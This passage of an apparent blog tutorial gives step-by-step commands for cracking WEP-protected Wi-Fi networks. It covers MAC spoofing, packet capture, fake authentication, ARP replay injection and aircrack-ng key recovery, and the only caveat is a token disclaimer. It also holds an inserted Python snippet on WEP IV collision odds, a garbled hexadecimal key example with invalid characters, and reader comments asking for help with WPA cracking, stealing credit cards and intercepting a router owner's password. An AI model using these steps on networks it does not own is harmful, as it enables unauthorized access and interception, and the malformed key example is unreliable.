airmon-ng
airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0
Now you will see something like this:
Once you’ve decided on a network, take note of its channel number and bssid. The bssid will look something like this:
00:23:69:bb:2d:0f
The Channel number will be under a heading that says “CH”.
airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0
Once you type in that last command, the airodump screen will change and show your computer gathering packets. You will also see a heading marked “IV” with a number underneath it. This stands for “Initialization Vector”, a value that WEP transmits in the clear at the front of every encrypted frame; in general terms, each one is another sample aircrack-ng can use to recover the password, and the more of them you collect, the better its chances. Once you gain a minimum of 5,000 of these IVs, you can try to crack the password. I’ve cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made their password. The more difficult the password, the more packets you will need to crack it.
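The IV count matters because WEP's IV is only 24 bits wide, so repeats become likely after a few thousand frames. As an added example (not part of the original post), the Python below computes the birthday-bound chance that an IV repeats after a given number of frames and flags IV reuse in a constructed list of observed IVs, which is what a WLAN monitor would alert on; the function names and sample values are my own.

```python
import math

IV_BITS = 24                 # WEP sends a 24-bit IV in the clear with every frame
IV_SPACE = 1 << IV_BITS      # 16,777,216 possible IVs for a given key


def iv_collision_probability(frames: int, space: int = IV_SPACE) -> float:
    """Birthday-bound probability that at least one IV repeats among `frames`
    frames whose IVs are chosen uniformly at random. Summing log1p terms keeps
    the product of (1 - i/space) factors from underflowing."""
    if frames >= space:
        return 1.0
    log_no_repeat = sum(math.log1p(-i / space) for i in range(frames))
    return 1.0 - math.exp(log_no_repeat)


def frames_for_collision_probability(target: float, space: int = IV_SPACE) -> int:
    """Smallest frame count at which the IV-repeat probability reaches `target`.
    Starts from the closed-form estimate sqrt(2 * space * ln(1/(1-p))) and
    then adjusts by single steps against the exact formula."""
    n = max(1, int(math.sqrt(2 * space * math.log(1.0 / (1.0 - target)))))
    while iv_collision_probability(n, space) < target:
        n += 1
    while n > 1 and iv_collision_probability(n - 1, space) >= target:
        n -= 1
    return n


def find_reused_ivs(ivs):
    """Return {iv: count} for every IV observed more than once. Under WEP an IV
    repeat with the same key means the same RC4 keystream was reused."""
    counts = {}
    for iv in ivs:
        counts[iv] = counts.get(iv, 0) + 1
    return {iv: c for iv, c in counts.items() if c > 1}


# Constructed sample: 3-byte IVs as read from the IV field of captured WEP frames.
SAMPLE_IVS = [bytes.fromhex(h) for h in
              ("0a1b2c", "0a1b2d", "ffff00", "0a1b2c", "000001", "ffff00", "ffff00")]

if __name__ == "__main__":
    for n in (1000, 5000, 20000):
        print(f"{n:>6} frames: P(IV repeat) = {iv_collision_probability(n):.3f}")
    print("frames for a 50% repeat chance:", frames_for_collision_probability(0.5))
    print("reused IVs in sample:",
          {iv.hex(): c for iv, c in find_reused_ivs(SAMPLE_IVS).items()})
```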
4. Cracking the WEP password
Leave this Konsole window up and running and open up a 2nd Konsole window.
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0
Now type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0
Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password.
aircrack-ng -b (bssid) (filename)-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. You typically need to wait for 10,000 to 20,000 IVs before it will crack. If you don’t have enough yet, aircrack will test what you’ve got so far and then say something like “not enough IV’s. Retry at 10,000.”
If you did everything correctly up to this point, before too long you will have the password! Don’t worry if it looks a little strange. Some passwords are saved in ASCII format, in which case aircrack will show you exactly the characters they typed in. Sometimes the password is saved in HEX format, in which case it will show you the HEX form of the password. You can type in either one and it will connect you to the network.
se:cr:et
0F:KW:94:27:VF
It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will be very adept. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal activity falls completely on you because, technically, this is just for you to test the security of your own network.
Ravi says
Bro, how to crack WPA, WPA2 pass…?
I don’t have a wordlist dictionary list…
spy Man says
Can you create software for this so that it is done automatically? I need an easy way to get credit cards.
DEV says
Hello sir, can I put an email address in the Tenda router
so that I receive the password when it is changed by the owner?
Anonymous says
Is there any easier method (I mean one which is simple to execute and has no such complication)?
Anonymous says
Thanks, I’ll try…. Sid
Anonymous says
Don’t you think mentioning MONITOR mode would be helpful? I mean it is necessary for this to work! Forget all this if you do not have a wifi card that is capable of monitor mode and utilizing the correct drivers. Use the LIVE DISK version of BackTrack, don’t install it. AND TO THE GUY ABOVE, SINCE WHEN DOES MEMORY = HARD DRIVE SPACE?? Go back to basic computers 101.
Anonymous says
CD not installing properly bro…
Anonymous says
yes :(
sid says
Lokesh, buddy, whenever I try installing the Backtrack3 CD it shows this error on cmd:
‘warning: not enough free memory’ while I have almost 40 GB of free space on the hard disk